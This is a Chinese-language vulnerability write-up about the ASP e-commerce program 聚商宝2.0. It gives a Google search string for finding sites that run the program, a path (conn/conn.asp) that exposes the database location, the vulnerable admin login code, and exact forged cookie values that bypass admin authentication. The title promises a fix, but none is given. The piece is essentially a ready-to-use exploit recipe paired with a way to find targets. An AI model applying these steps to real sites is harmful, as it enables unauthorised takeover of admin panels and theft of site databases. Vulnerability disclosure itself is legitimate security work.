聚商宝2.0暴库及cookies欺骗缺陷及修复

程序:聚商宝2.0
  google关键字:intext:技术支持:奔明科技 聚商宝
  前几天遇到了个程序叫聚商宝,把源码下载过来了,今天才有时间简单的看了看……
  漏洞:暴库以及后台cookies欺骗
  1)直接访问conn/conn.asp 暴出数据库地址,下载,解密,登录后台
  2)cookies欺骗,admin文件夹下check.asp文件中的代码片段:
  dim uid,upwd www.****.com
  uid=Replace_Text(Request.Form("userid"))
  upwd=md5(Replace_Text(Request.Form("password")),16)
  Verifycode=Replace_Text(request.Form("verifycode"))
  if not isnumeric(Verifycode) then
  Call Logerr()
  Call  ErroFy()
  end if
  if Cint(Verifycode)<>Session("SafeCode") then
  Call  ErroFy()
  Sub ErroFy()
  response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
  response.write"<TR>"
  response.write"<TH class=tableHeaderText colSpan=2 height=25>出现错误提示</TH>"
  response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>验证码错误!

</div></td></tr>"
  response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'><< 返回上一页

</a></td>"
  response.write"</tr>"
  response.write"</table>"
  Response.End()
  End Sub
  else
  Set rs=server.createobject("adodb.recordset")
  sqltext="select * from benming_master where Username='" & uid & "' and [PassWord]='" & upwd & "'"
  rs.open sqltext,conn,1,1
  If Rs.Eof And Rs.Bof Then
  response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
  response.write"<TR>"
  response.write"<TH class=tableHeaderText colSpan=2 height=25>出现错误提示</TH>"
  response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>登陆名或密码不正

确!</div></td></tr>"
  response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='login.asp'><< 返回上一页

</a></td>"
  response.write"</tr>"
  response.write"</table>"
  else
  Response.Cookies("globalecmaster")=rs("username")
  Response.Cookies("masterflag")=rs("flag")
  Response.Cookies("adminid")=rs("id")
  LastLogin=Date()
  LastLoginIP=getIP()
  sql="update benming_master set LastLogin='"&LastLogin&"',LastLoginIP='"&LastLoginIP&"' where

username='"&uid&"'"
  conn.execute(sql)
  response.write"<table cellpadding=2 cellspacing=1 border=0 width=100% class=tableBorder align=center>"
  response.write"<TR>"
  response.write"<TH class=tableHeaderText colSpan=2 height=25>登陆成功提示</TH>"
  response.write"<TR><tr><td height=85 valign=top class=forumRow><div align=center><br><br>成功通过网站后台

管理员身份认证!<br><br>2秒后自动进入后台…</div></td></tr>"
  response.write"<tr align=center><td height=30 class=forumRowHighlight><a href='index.asp'>进入后台管理

</a></td>"
  response.write"</tr>"
  response.write"</table>"
  %>
  <meta HTTP-EQUIV=refresh Content='2;url=index.asp'>
  <%
  end if
  rs.close
  set rs=nothing
  end if
  利用方法:用啊D直接访问后台,修改如下cookie,然后访问admin/index.asp登录。
  globalecmaster=admin; masterflag=01%2C%2002%2C%2003%2C%2004%
  2C%2005%2C%2006%2C%2007%2C%2008%2C%2009%2C%20010; adminid=1

源链接

Hacking more

...